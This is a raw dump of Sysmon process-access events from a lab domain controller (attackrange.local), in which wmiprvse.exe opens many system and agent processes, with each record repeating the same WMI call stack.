Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027388Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.350{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A22-6008-DB00-00000000A301}4244C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027387Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.350{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A1A-6008-B100-00000000A301}2640C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027386Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.350{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027385Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.350{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A11-6008-9600-00000000A301}4612C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027384Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.350{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8200-00000000A301}4876C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027383Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.350{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8100-00000000A301}4864C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027382Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.350{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7F00-00000000A301}4328C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027381Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.350{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7E00-00000000A301}4316C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027380Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.350{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499C-6008-5500-00000000A301}3796C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027379Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.350{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499B-6008-5100-00000000A301}3588C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027378Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.350{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3600-00000000A301}3468C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027377Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.350{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3400-00000000A301}3124C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027376Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.350{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3300-00000000A301}2260C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027375Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.350{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3200-00000000A301}2612C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027374Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.350{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3100-00000000A301}2704C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027373Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.350{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3000-00000000A301}3068C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027372Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.350{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2E00-00000000A301}3028C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027371Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.350{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2D00-00000000A301}2328C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027370Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.350{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2C00-00000000A301}2896C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027369Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 